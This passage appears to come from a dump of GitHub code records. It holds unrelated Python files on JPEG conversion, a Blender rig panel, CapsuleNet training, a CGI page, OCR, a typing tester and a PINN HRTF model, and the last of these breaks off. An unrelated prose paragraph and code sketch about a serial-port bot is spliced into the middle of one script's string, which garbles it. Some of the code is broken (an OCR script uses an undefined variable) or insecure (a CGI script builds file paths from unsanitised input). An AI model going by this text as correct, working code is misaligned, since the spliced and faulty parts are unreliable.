argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='Compress image as JPEG. 
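bot.py above reads one byte at a time from the serial port, folds `\r` into `\n`, and regex-matches completed lines. The same line-assembly and prompt-matching logic exercised without hardware, on canned input; note this sketch uses `m.group(1)` rather than the script's `m.group(0)`, which would also include whatever character `.?` happened to capture:

```python
import re

def handle_line(line):
    m = re.search(r".?(\d)", line)
    if "selected" in line.lower() and m:
        print(f"We are on level {int(m.group(1))}")

cur = ""
for ch in "Level 3 selected\rEnter the Code:\r":   # pretend serial bytes
    if ch == "\r":
        ch = "\n"
    cur += ch
    if ch == "\n":
        handle_line(cur)
        cur = ""
```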
The output version is the input version with \"Jpeg\" appended.')\n\nparser.add_argument(\"input_spec\", type=str, help=\"Input specifier\")\nparser.add_argument(\"--depth\", type=int, help=\"Image depth\", default=8) # imagemagick cannot generate 16-bit JPEG (?)\nparser.add_argument(\"--quality\", type=int, help=\"JPEG quality\", default=80)\nargs = parser.parse_args()\n\n\ninput_spec = load_ini(args.input_spec)\nimage_name_list = input_spec['image_name_list']\nstack = input_spec['stack']\nprep_id = input_spec['prep_id']\nif prep_id == 'None':\n prep_id = None\nresol = input_spec['resol']\nversion = input_spec['version']\nif version == 'None':\n version = None\n\ndepth = args.depth\nquality = args.quality\n\nfor img_name in image_name_list:\n\n in_fp = DataManager.get_image_filepath_v2(stack=stack, prep_id=prep_id, resol=resol, version=version, fn=img_name)\n out_fp = DataManager.get_image_filepath_v2(stack=stack, prep_id=prep_id, resol=resol, version=version+'Jpeg', fn=img_name)\n\n create_parent_dir_if_not_exists(out_fp)\n #download_from_s3(input_fp)\n execute_command(\"convert \\\"%(input_fp)s\\\" -depth %(depth)d -format jpg -quality %(quality)d \\\"%(output_fp)s\\\"\" % dict(input_fp=in_fp, output_fp=out_fp, depth=depth, quality=quality))\n #upload_to_s3(output_fp)\n\n","repo_name":"mistycheney/MouseBrainAtlas","sub_path":"preprocess/compress_jpeg.py","file_name":"compress_jpeg.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"21480426240","text":"import bpy\r\n\r\nmodule_names = [\r\n 'helpers',\r\n 'autoname_bone_chain',\r\n 'bone_lock',\r\n 'constraints_stretchto_reset',\r\n 'properties',\r\n 'retarget_armature',\r\n 'selection_sets',\r\n]\r\nfrom .. 
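compress_jpeg.py above builds the ImageMagick command by string interpolation and hands it to `execute_command`. A sketch of the same invocation through `subprocess.run` with an argument list, which sidesteps shell quoting of paths containing spaces — the sample filenames are placeholders, and ImageMagick's `convert` must be on PATH:

```python
import subprocess

def compress_jpeg(in_fp, out_fp, depth=8, quality=80):
    # Same ImageMagick flags as the script, but no shell string interpolation
    subprocess.run(
        ["convert", in_fp, "-depth", str(depth), "-format", "jpg",
         "-quality", str(quality), out_fp],
        check=True,
    )

# compress_jpeg("slice_0001.tif", "slice_0001.jpg")   # assumes ImageMagick is installed
```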
import import_or_reload_modules, register_submodules, unregister_submodules\r\nmodules = import_or_reload_modules(module_names, __name__)\r\n\r\nclass GRET_PT_rig(bpy.types.Panel):\r\n bl_space_type = 'VIEW_3D'\r\n bl_region_type = 'UI'\r\n bl_category = \"gret\"\r\n bl_label = \"Rig\"\r\n\r\n draw_funcs = []\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n return (context.active_object\r\n and context.active_object.type == 'ARMATURE'\r\n and context.mode in {'OBJECT', 'POSE', 'EDIT_ARMATURE'}\r\n and cls.draw_funcs)\r\n\r\n def draw(self, context):\r\n for draw_func in __class__.draw_funcs:\r\n draw_func(self, context)\r\n\r\ndef register(settings, prefs):\r\n global registered_modules\r\n registered_modules = register_submodules(modules, settings, GRET_PT_rig.draw_funcs)\r\n\r\n bpy.utils.register_class(GRET_PT_rig)\r\n\r\ndef unregister():\r\n bpy.utils.unregister_class(GRET_PT_rig)\r\n\r\n unregister_submodules(registered_modules, GRET_PT_rig.draw_funcs)\r\n","repo_name":"greisane/gret","sub_path":"rig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"6"} +{"seq_id":"70472752827","text":"from asyncio import sleep\nfrom click import Tuple\nimport torch\nimport numpy as np\nimport random\nimport cv2\nfrom tqdm import tqdm\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport torchsummary\nfrom torch.optim import Adam\nfrom torch import optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\n\nfrom sklearn import metrics\nfrom sklearn.metrics import recall_score, accuracy_score, precision_score, log_loss, classification_report, f1_score\nfrom metrics.metric import calculate_cls_metrics\n\nfrom utils.Log import Logger\nfrom utils.EarlyStopping import EarlyStopping\nfrom utils.ModelSaver import ModelSaver\n\nfrom dataloader.gen_dataloader import *\n\nimport sys, os\nimport os.path as osp\nsys.path.append(osp.dirname(__file__))\n\nfrom loss.focal_loss import FocalLoss as FL\nfrom loss.weightedBCE_loss import WeightedBinaryCrossEntropy as WBCE\n\nfrom typing import List, Tuple\nimport warnings\n# warnings.filterwarnings(\"default\")\nfrom sklearn.exceptions import UndefinedMetricWarning\n\nfrom model.cnn.capsule_net.model import VggExtractor, CapsuleNet\nfrom loss.capsule_loss import CapsuleLoss\nfrom module.train_torch import define_log_writer, define_device, calculate_metric, save_result, find_current_earlystopping_score\nfrom metrics.metric import calculate_cls_metrics\n\ndef eval_capsulenet(capnet, vgg_ext, dataloader, device, capsule_loss, adj_brightness=1.0, adj_contrast=1.0 ):\n capnet.eval()\n\n y_label = []\n y_pred = []\n y_pred_label = []\n loss = 0\n mac_accuracy = 0\n \n for inputs, labels in dataloader:\n labels[labels > 1] = 1\n img_label = labels.numpy().astype(np.float)\n inputs, labels = inputs.to(device), labels.to(device)\n\n input_v = Variable(inputs)\n x = vgg_ext(input_v)\n classes, class_ = capnet(x, random=False)\n\n loss_dis = capsule_loss(classes, Variable(labels, requires_grad=False))\n loss_dis_data = loss_dis.item()\n output_dis = class_.data.cpu().numpy()\n\n output_pred = np.zeros((output_dis.shape[0]), dtype=np.float)\n\n for i in range(output_dis.shape[0]):\n if output_dis[i,1] >= output_dis[i,0]:\n output_pred[i] = 1.0\n else:\n output_pred[i] = 0.0\n\n loss += loss_dis_data\n y_label.extend(img_label)\n y_pred.extend(output_dis)\n y_pred_label.extend(output_pred)\n mac_accuracy 
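The gret panel above draws by iterating a class-level `draw_funcs` list that sub-modules populate at registration time, so new sections plug in without touching the panel class. The pattern reduced to plain Python, independent of `bpy` (all names below are illustrative):

```python
class Panel:
    draw_funcs = []              # sub-modules append their contributions here

    def draw(self, context):
        for draw_func in self.draw_funcs:
            draw_func(self, context)

def draw_lock_section(panel, context):
    print("lock section for", context)

Panel.draw_funcs.append(draw_lock_section)
Panel().draw("armature")         # -> lock section for armature
```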
+= metrics.accuracy_score(img_label, output_pred)\n \n mac_accuracy /= len(dataloader)\n loss /= len(dataloader)\n assert len(y_label) == len(y_pred_label), \"Bug\"\n ######## Calculate metrics:\n # built-in methods for calculating metrics\n mic_accuracy, reals, fakes, micros, macros = calculate_metric(y_label, y_pred_label)\n calculate_cls_metrics(y_label=np.array(y_label, dtype=np.float64), y_pred_label=np.array(y_pred_label, dtype=np.float64), save=True, print_metric=False)\n return loss, mac_accuracy, mic_accuracy, reals, fakes, micros, macros\n\ndef train_capsulenet(train_dir = '', val_dir ='', test_dir = '', gpu_id=0, beta1=0.9, dropout=0.05, image_size=128, lr=3e-4, \\\n batch_size=16, num_workers=4, checkpoint='', resume='', epochs=20, eval_per_iters=-1, seed=0, \\\n adj_brightness=1.0, adj_contrast=1.0, es_metric='val_loss', es_patience=5, model_name=\"capsule\", args_txt=\"\", dropout_in_mlp=True, augmentation=False):\n # Generate dataloader train and validation \n dataloader_train, dataloader_val, num_samples = generate_dataloader_single_cnn_stream(train_dir, val_dir, image_size, batch_size, num_workers, augmentation=augmentation)\n dataloader_test = generate_test_dataloader_single_cnn_stream(test_dir, image_size, batch_size, num_workers)\n \n # Define devices\n device = define_device(seed=seed, model_name=model_name)\n \n # Define and load model\n vgg_ext = VggExtractor().to(device)\n capnet = CapsuleNet(num_class=2, device=device).to(device)\n \n # Define optimizer (Adam) and learning rate decay\n init_lr = lr\n init_epoch = 0\n init_step = 0\n init_global_acc = 0\n init_global_loss = 0\n if resume != \"\":\n try:\n if 'epoch' in checkpoint:\n init_epoch = int(resume.split('_')[3])\n init_step = init_epoch * len(dataloader_train)\n init_lr = lr * (0.8 ** ((init_epoch - 1) // 2))\n print('Resume epoch: {} - with step: {} - lr: {}'.format(init_epoch, init_step, init_lr))\n if 'step' in checkpoint:\n init_step = int(resume.split('_')[3])\n init_epoch = int(init_step / len(dataloader_train))\n init_lr = lr * (0.8 ** (init_epoch // 2))\n with open(osp.join(checkpoint, 'global_acc_loss.txt'), 'r') as f:\n line = f.read().strip()\n init_global_acc = float(line.split(',')[0])\n init_global_loss = float(line.split(',')[1])\n print('Resume step: {} - in epoch: {} - lr: {} - global_acc: {} - global_loss: {}'.format(init_step, init_epoch, init_lr, init_global_acc, init_global_loss)) \n except:\n pass\n \n optimizer = optim.Adam(capnet.parameters(), lr=init_lr, betas=(beta1, 0.999))\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones = [2*i for i in range(1, epochs//2 + 1)], gamma = 0.8)\n\n # Define criterion\n capsule_loss = CapsuleLoss().to(device)\n \n # Define logging factor:\n ckc_pointdir, log, batch_writer, epoch_writer_tup, step_writer_tup = define_log_writer(checkpoint, resume, args_txt, (capnet, model_name, image_size))\n epoch_ckcpoint, epoch_val_writer, epoch_test_writer = epoch_writer_tup\n step_ckcpoint, step_val_writer, step_test_writer = step_writer_tup\n \n # Define Early stopping and Model saver\n early_stopping = EarlyStopping(patience=es_patience, verbose=True, tunning_metric=es_metric)\n epoch_model_saver = ModelSaver(save_metrics=[\"val_loss\", \"val_acc\", \"test_loss\", 'test_acc'])\n step_model_saver = ModelSaver(save_metrics=[\"val_loss\", \"val_acc\", \"test_loss\", 'test_acc'])\n \n if resume != \"\":\n capnet.load_state_dict(torch.load(osp.join(checkpoint, resume)))\n capnet.train(mode=True)\n \n if device != 'cpu':\n for state in 
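`eval_capsulenet` above tracks both a per-batch average accuracy (`mac_accuracy`, incremented per batch and divided by the batch count) and a pooled score over all labels. With unequal batch sizes the two can differ, because the last, smaller batch gets the same weight as a full one — a small demonstration with invented toy batches:

```python
import numpy as np
from sklearn import metrics

batches = [
    (np.array([1, 1, 1, 1]), np.array([1, 1, 1, 0])),  # (labels, predictions)
    (np.array([0, 0]),       np.array([1, 1])),
]

per_batch = np.mean([metrics.accuracy_score(y, p) for y, p in batches])
y_all = np.concatenate([y for y, _ in batches])
p_all = np.concatenate([p for _, p in batches])
pooled = metrics.accuracy_score(y_all, p_all)
print(per_batch, pooled)   # 0.375 vs 0.5
```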
optimizer.state.values():\n for k, v in state.items():\n if isinstance(v, torch.Tensor):\n state[k] = v.cuda()\n\n global_loss = init_global_loss\n global_acc = init_global_acc\n global_step = init_step\n\n capnet.train()\n\n for epoch in range(init_epoch, epochs):\n print(\"\\n=========================================\")\n print(\"Epoch: {}/{}\".format(epoch+1, epochs))\n print(\"Model: {} - {}\".format(model_name, args_txt))\n print(\"lr = \", optimizer.param_groups[0]['lr'])\n\n # Train\n capnet.train()\n running_loss = 0\n running_acc = 0\n y_label = np.array([], dtype=np.float)\n y_pred_label = np.array([], dtype=np.float)\n\n y_label_step = []\n y_pred_label_step = []\n \n print(\"Training...\")\n for inputs, labels in tqdm(dataloader_train):\n global_step += 1\n # Push to device\n labels[labels > 1] = 1\n img_label = labels.numpy().astype(np.float)\n inputs, labels = inputs.to(device), labels.to(device)\n # Clear gradient after a step\n optimizer.zero_grad()\n\n # Forward network\n input_v = Variable(inputs)\n x = vgg_ext(input_v)\n classes, class_ = capnet(x, random=True, dropout=dropout)\n\n # Find loss\n loss_dis = capsule_loss(classes, Variable(labels, requires_grad=False))\n loss_dis_data = loss_dis.item()\n \n # Backpropagation and update weights\n loss_dis.backward()\n optimizer.step()\n\n # update running (train) loss and accuracy\n output_dis = class_.data.cpu().numpy()\n output_pred = np.zeros((output_dis.shape[0]), dtype=np.float)\n\n for i in range(output_dis.shape[0]):\n if output_dis[i,1] >= output_dis[i,0]:\n output_pred[i] = 1.0\n else:\n output_pred[i] = 0.0\n \n y_label = np.concatenate((y_label, img_label))\n y_pred_label = np.concatenate((y_pred_label, output_pred))\n \n running_loss += loss_dis_data\n global_loss += loss_dis_data\n y_label_step.extend(img_label)\n y_pred_label_step.extend(output_pred)\n global_acc += metrics.accuracy_score(y_label_step, y_pred_label_step)\n\n # Save step's loss:\n # To tensorboard and to writer\n log.write_scalar(scalar_dict={\"Loss/Single step\": loss_dis_data}, global_step=global_step)\n batch_writer.write(\"{},{:.4f}\\n\".format(global_step, loss_dis_data))\n\n # Eval after iters:\n if eval_per_iters != -1:\n if global_step % eval_per_iters == 0:\n capnet.eval()\n # Eval validation set\n val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros = eval_capsulenet(capnet, vgg_ext, dataloader_val, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n save_result(step_val_writer, log, global_step, global_loss/global_step, global_acc/global_step, val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros, is_epoch=False, phase=\"val\")\n # Eval test set\n test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros = eval_capsulenet(capnet, vgg_ext, dataloader_test, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n save_result(step_test_writer, log, global_step, global_loss/global_step, global_acc/global_step, test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros, is_epoch=False, phase=\"test\")\n # Save model:\n step_model_saver(global_step, [val_loss, val_mic_acc, test_loss, test_mic_acc], step_ckcpoint, capnet)\n step_model_saver.save_last_model(step_ckcpoint, capnet, global_step)\n step_model_saver.save_model(step_ckcpoint, capnet, global_step, save_ckcpoint=False, global_acc=global_acc, global_loss=global_loss)\n\n es_cur_score = 
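The step just below hands this score to the `EarlyStopping` helper imported from `utils.EarlyStopping`. A minimal lower-is-better version of that idea with a patience counter — a sketch, not the project's actual class:

```python
class EarlyStopping:
    def __init__(self, patience=5):
        self.patience, self.best, self.counter, self.early_stop = patience, None, 0, False

    def __call__(self, score):
        # Assumes lower is better (e.g. a validation loss)
        if self.best is None or score < self.best:
            self.best, self.counter = score, 0
        else:
            self.counter += 1
            self.early_stop = self.counter >= self.patience

es = EarlyStopping(patience=2)
for loss in [0.9, 0.8, 0.85, 0.84, 0.83]:
    es(loss)
print(es.early_stop)   # True: no improvement for 2 checks after 0.8
```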
find_current_earlystopping_score(es_metric, val_loss, val_mic_acc, test_loss, test_mic_acc, test_reals[2], test_fakes[2], test_macros[2])\n early_stopping(es_cur_score)\n if early_stopping.early_stop:\n print('Early stopping. Best {}: {:.6f}'.format(es_metric, early_stopping.best_score))\n time.sleep(5)\n os.rename(src=ckc_pointdir, dst=osp.join(checkpoint, \"({:.4f}_{:.4f}_{:.4f}_{:.4f})_{}\".format(step_model_saver.best_scores[0], step_model_saver.best_scores[1], step_model_saver.best_scores[2], step_model_saver.best_scores[3], args_txt if resume == '' else 'resume')))\n return\n capnet.train()\n\n y_label_step = []\n y_pred_label_step = []\n \n running_acc = metrics.accuracy_score(y_label, y_pred_label) \n # Eval\n # print(\"Validating epoch...\")\n # capnet.eval()\n # val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros = eval_capsulenet(capnet, vgg_ext, dataloader_val, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n # save_result(epoch_val_writer, log, epoch+1, running_loss/len(dataloader_train), running_acc, val_loss, val_mac_acc, val_mic_acc, val_reals, val_fakes, val_micros, val_macros, is_epoch=True, phase=\"val\")\n # # Eval test set\n # test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros = eval_capsulenet(capnet, vgg_ext, dataloader_test, device, capsule_loss, adj_brightness=adj_brightness, adj_contrast=adj_brightness)\n # save_result(epoch_test_writer, log, epoch+1, running_loss/len(dataloader_train), running_acc, test_loss, test_mac_acc, test_mic_acc, test_reals, test_fakes, test_micros, test_macros, is_epoch=True, phase=\"test\")\n # # Save model:\n # epoch_model_saver(epoch+1, [val_loss, val_mic_acc, test_loss, test_mic_acc, test_reals[2], test_fakes[2], test_macros[2]], epoch_ckcpoint, capnet)\n # epoch_model_saver.save_last_model(epoch_ckcpoint, capnet, epoch+1)\n \n # Reset to the next epoch\n running_loss = 0\n running_acc = 0\n scheduler.step()\n capnet.train()\n # Early stopping:\n #\n time.sleep(5)\n # Save epoch acc val, epoch acc test, step acc val, step acc test\n os.rename(src=ckc_pointdir, dst=osp.join(checkpoint, \"({:.4f}_{:.4f}_{:.4f}_{:.4f})_{}\".format(step_model_saver.best_scores[0], step_model_saver.best_scores[1], step_model_saver.best_scores[2], step_model_saver.best_scores[3], args_txt if resume == '' else 'resume')))\n # os.rename(src=ckc_pointdir, dst=osp.join(checkpoint, \"({:.4f}_{:.4f}_{:.4f}_{:.4f})_{}\".format(epoch_model_saver.best_scores[1], epoch_model_saver.best_scores[3], step_model_saver.best_scores[1], step_model_saver.best_scores[3], args_txt if resume == '' else 'resume')))\n return","repo_name":"phuc180155/GraduationThesis","sub_path":"my_thesis/forensics/dl_technique/module/train_two_outclass.py","file_name":"train_two_outclass.py","file_ext":"py","file_size_in_byte":13630,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"28507943634","text":"#!C:\\Users\\op\\anaconda3\\python.exe\n\nimport cgi\nimport cgitb\ncgitb.enable()\n\nform = cgi.FieldStorage()\ntitle = form['title'].value\ndescription = form['description'].value\n\nnew_file= open(\"content/{}.txt\".format(title), 'w', encoding='utf-8')\nnew_file.write(description)\n\nprint(\"Location: 
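When resuming, the code above reconstructs the learning rate in closed form as `lr · 0.8^((epoch−1)//2)`, which appears to mirror the `MultiStepLR(milestones=[2, 4, …], gamma=0.8)` schedule stepped once per epoch. The closed form checked directly:

```python
lr = 3e-4
for epoch in range(1, 9):                        # 1-indexed training epochs
    print(epoch, lr * 0.8 ** ((epoch - 1) // 2))
# epochs 1-2 run at 3.0e-4, 3-4 at 2.4e-4, 5-6 at 1.92e-4, 7-8 at 1.536e-4
```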
index.py?id={}\\n\".format(title))\n","repo_name":"Han-seokwon/WEB_programming","sub_path":"python_web/python_CGI/process_create.py","file_name":"process_create.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41347146904","text":"\n# import the necessary packages\nfrom PIL import Image\nimport pytesseract\nimport argparse\nimport cv2\nimport os\n\n#choose your Preprocessor Here\npreprocess=\"thresh\"\nfilename = \"Output/test.png\" #location of image\n\nif preprocess == \"thresh\":\n\tgray = cv2.threshold(gray, 0, 255,\n\t\tcv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n# make a check to see if median blurring should be done to remove\n# noise\nelif preprocess == \"blur\":\n\tgray = cv2.medianBlur(gray, 3)\n\n# write the grayscale image to disk as a temporary file so we can\n# apply OCR to it\ncv2.imwrite(filename, gray)\n\n# load the image as a PIL/Pillow image, apply OCR, and then delete\n# the temporary file\ntext = pytesseract.image_to_string(Image.open(filename))\nos.remove(filename)\nprint(text)\n\n# show the output images\n# cv2.imshow(\"Image\", image)\ncv2.imshow(\"Output\", gray)\ncv2.waitKey(0)\n","repo_name":"SRM-Hackathon/Dragon-Booster","sub_path":"Character_Recognization_Code/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43927741864","text":"import tkinter as tk\nimport csv\nimport random\nimport time\nfrom PIL import Image, ImageTk\n\n############ SENTENCE GETTER ############\ndef sentencer():\n with open(\"sentences.csv\", \"r\") as sentence_csv_file:\n csv_reader = csv.reader(sentence_csv_file)\n next(csv_reader)\n return random.choice([line[0] for line in csv_reader])\n\n############ REGISTER PRESS ############\nactive = True\ndef onKeyPress(event):\n if (event.char.isalnum() or event.char.isspace() or event.char =='-' or event.char ==','or event.char ==\"'\") and active==True:\n key_checker(event.char,sent)\n\n\n############ RESET ############\ndef reset():\n global cnt, active, start, end, charpersec, wordpermin, incorrect, sent\n sent = sentencer().lower()\n\n label1.config(text=('TYPE SENTENCE BELOW:\\n\\n' + ''))\n text.configure(state='normal')\n text.delete(\"1.0\", \"end\")\n text.insert(tk.END,chars= sent)\n text.configure(state='disabled')\n label2.config(text=('Char/Sec: \\nWord/Min: \\n% Correct: '), justify='left')\n\n cnt,charpersec,wordpermin,incorrect=0,0,0,0\n active=True\n\n\n############ CHECK PRESS ############\ncnt = 0\nincorrect = 0\ndef key_checker(char,sentence):\n global cnt, active, start, end, charpersec, wordpermin, incorrect\n if cnt == (len(sentence)-2):\n if char == sentence[cnt]:\n text.configure(state='normal')\n text.tag_remove('cur', f\"1.{cnt}\")\n text.tag_add(\"o\", f\"1.{cnt}\", )\n text.tag_configure(\"o\", foreground='green')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n else:\n text.configure(state='normal')\n text.tag_remove('cur', f\"1.{cnt}\")\n text.tag_add(\"x\", f\"1.{cnt}\")\n text.tag_configure(\"x\", foreground='red')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n active=False\n end = time.time()\n timed = end - start\n print(timed)\n charpersec = round((len(sent) / timed),2)\n wordpermin = round((charpersec*12),2)\n percor = round(((len(sent)-incorrect)/len(sent))*100,2)\n print(f'Characters Per Second: {charpersec}\\nWords 
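ocr.py above thresholds `gray` before any image is loaded or converted, so it fails with a `NameError` as written. A repaired, self-contained sketch — the input path is the script's own placeholder, and the temp-file round trip is replaced by `Image.fromarray`:

```python
import cv2
import pytesseract
from PIL import Image

image = cv2.imread("Output/test.png")              # load the page image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)     # the step missing in the script

preprocess = "thresh"
if preprocess == "thresh":
    gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
elif preprocess == "blur":
    gray = cv2.medianBlur(gray, 3)

text = pytesseract.image_to_string(Image.fromarray(gray))   # no temp file needed
print(text)
```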
Per Minute (average): {wordpermin}\\n% Correct: {percor}%')\n label2.config(text=(f'Char/Sec: {charpersec}\\nWord/Min: {wordpermin}\\n% Correct: {percor}%'))\n elif char == sentence[cnt]:\n if cnt==0:\n start = time.time()\n print(\"hello\")\n text.configure(state='normal')\n text.tag_remove('cur',f\"1.{cnt}\")\n text.tag_add(\"o\",f\"1.{cnt}\",)\n text.tag_configure(\"o\",foreground='green')\n text.tag_add(\"cur\",f\"1.{cnt+1}\",)\n text.tag_configure(\"cur\",background='orange')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n else:\n text.configure(state='normal')\n text.tag_remove('cur',f\"1.{cnt}\")\n text.tag_add(\"x\",f\"1.{cnt}\")\n text.tag_configure(\"x\",foreground='red')\n text.tag_add(\"cur\",f\"1.{cnt+1}\",)\n text.tag_configure(\"cur\",background='orange')\n text.configure(state='disabled')\n text.grid(row=1, column=0, columnspan=1)\n incorrect+=1\n\n cnt+=1\n\n\n\n\n############ WINDOW ############\n\nsent = sentencer().lower()\nwindow = tk.Tk()\nwindow.iconbitmap('favicon.ico')\nwindow.title(' Typing Speed Test')\nsw = round(window.winfo_screenwidth() / 2)\nsh = round(window.winfo_screenheight() / 3)\nwindow.geometry(f'{sw}x{sh}')\nwindow.configure(bg='#FFFFFF')\nmy_font1=('times', 30, 'bold')\n\nlabel1 = tk.Label(window,text=('TYPE SENTENCE BELOW:\\n\\n' + ''),width=30,font=my_font1,bg='#FFFFFF')\nlabel1.configure(bg='#FFFFFF', wraplength=600)\nlabel1.grid(row=0,column=0,columnspan=1)\n\n\ntext = tk.Text(window, font=('Sans Serif', 24), height=4, width=round(sw/40),wrap='word')\ntext.insert(tk.END,chars= sent)\ntext.configure(state='disabled')\ntext.grid(row=1,column=0,columnspan=1)\n\n\nlabel2 = tk.Label(window,text=('Char/Sec: \\nWord/Min: \\n% Correct: '),width=30,font=my_font1,bg='#FFFFFF', justify='left')\nlabel2.configure(bg='#FFFFFF', wraplength=400)\nlabel2.grid(row=1,column=1,columnspan=1)\n\nbutton1 = tk.Button(window, text='Browse Files',width=20,command = lambda:reset())\nbtn_img = Image.open('button_reset.png')\nimz = ImageTk.PhotoImage(btn_img)\nbutton1.configure(image=imz, width=imz.width(), bg='#FFFFFF',borderwidth=0)\nbutton1.grid(row=2,column=0,columnspan=1, padx=10, pady=10)\n\n############ TIMER ############\nstart = time.time()\nprint(\"hello\")\nend = time.time()\ncharpersec = 0\nwordpermin = 0\n\n\n\n\n\n############ ############ ############\nwindow.bind('', onKeyPress)\nwindow.mainloop()","repo_name":"GithubMastor/typing-speed-tester","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10220581199","text":"########################################################################################################################\n# PINN method for HRTF interpolation \n# \n# Given HRTF from limited number of directions (330 hrtf), \n# we wish to interpolate the HRTF over a large direction (930 hrtf)\n# \n# Fei Ma, \n# feima1024@gmail.com\n# 4th, Oct, 2023 \n########################################################################################################################\n## if you find the code useful, \n## please consider denoting to the Free Sofware Fundation or the Wikimedia Foundation\n## https://my.fsf.org/\n## https://wikimediafoundation.org/\n########################################################################################################################\n# the code runs on my macpro with python 3.9, 3.10, tensorflow 2.12 and 2.13\n# the numpy version and scipy 
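`key_checker` above derives characters per second, words per minute as `cps × 12` (60 seconds per minute over the conventional 5 characters per word), and percent correct. The same arithmetic as a pure function, easier to test than the Tkinter callback it lives in:

```python
def typing_stats(sentence_len, seconds, incorrect):
    cps = sentence_len / seconds
    wpm = cps * 12                    # 60 s/min divided by 5 chars/word
    pct = (sentence_len - incorrect) / sentence_len * 100
    return round(cps, 2), round(wpm, 2), round(pct, 2)

print(typing_stats(sentence_len=60, seconds=15, incorrect=3))  # (4.0, 48.0, 95.0)
```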
version should not be a problem if they are compitable with python and tensorflow\n# With just 3 hidden layers and <16 nodes in each hidden layer, the Network is small, and can be trained faster on \n# powerful CPU rather than GPU. \n########################################################################################################################\n# import the python packages, \nimport tensorflow as tf\nfrom tensorflow.keras import activations\nfrom keras import backend as K\nimport logging \nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\nimport numpy as np\nfrom time import time as now\nfrom datetime import datetime\nimport scipy.optimize\nimport scipy.io as sio\nimport random\nDTYPE='float32' ## using float64 will result in slightly better results around 1~2 dB, but that will double the training time \ntf.keras.backend.set_floatx(DTYPE)\nfor ii in range(50): \n print(\">>>\")\n########################################################################################################################\n\n\n\n\n\n\n\n\n\n\n\n\n######################################################################################################################## \n### the definiton of the PINN model \n############################################################# \n### neural network initialization \ndef init_model(num_input=3, layers = 3, neurons=3): ## (x,y,z) input number is 3, layer number = depth L, neuron number = width W \n model = tf.keras.Sequential()\n model.add(tf.keras.Input(num_input)) ## input layer \n for ii in range(layers): ## hidden layers \n model.add(tf.keras.layers.Dense(neurons,activation=tf.keras.activations.get('tanh'),kernel_initializer='glorot_normal'))\n model.add(tf.keras.layers.Dense(1)) ## output layer \n return model\n############################################################# \n### calculate the PDE loss \ndef get_pde(model,pde_input,wave_num1):\n with tf.GradientTape(persistent=True) as tape:\n x1, x2, x3 = pde_input[:,0:1], pde_input[:,1:2], pde_input[:,2:3] # (x1,x2,x3) = (x,y,z) \n tape.watch(x1) ## notify tensorflow that we care about the gradient with respect to x1, x2, x3\n tape.watch(x2)\n tape.watch(x3)\n pde_pred = model(tf.stack([x1[:,0],x2[:,0],x3[:,0]],axis=1)) # mode prediction \n x1_d1 = tape.gradient(pde_pred,x1) ## first order gradient with respect to x, y, z\n x2_d1 = tape.gradient(pde_pred,x2)\n x3_d1 = tape.gradient(pde_pred,x3)\n x1_d2 = tape.gradient(x1_d1,x1) ## second order gradient with respect to x, y, z\n x2_d2 = tape.gradient(x2_d1,x2)\n x3_d2 = tape.gradient(x3_d1,x3)\n del tape\n Laplacian = ( x1_d2 + x2_d2 + x3_d2 )*wave_num1 ## wave_num1 = (1/(omega/c))^2, this normalize the laplacian \n loss_pde = tf.reduce_mean(tf.square(Laplacian + pde_pred)) ## this line of code calculate the PDE loss \n return loss_pde ## return the PDE loss \n#############################################################\n### calculate the data loss \ndef get_data(model,data_input,data_target): \n data_pred = model(data_input) ## mode prediction \n loss_data = tf.reduce_mean(tf.square(data_pred-data_target)) ## calcualte the difference between training data and the prediction, result in the data loss \n return loss_data ## return the data loss \n############################################################# \n### calculat the gradient with respect to the loss \ndef get_grad(model,data_input,data_target,pde_input,wave_num1):\n with tf.GradientTape(persistent=True) as tape:\n tape.watch(model.trainable_variables)\n loss_data = 
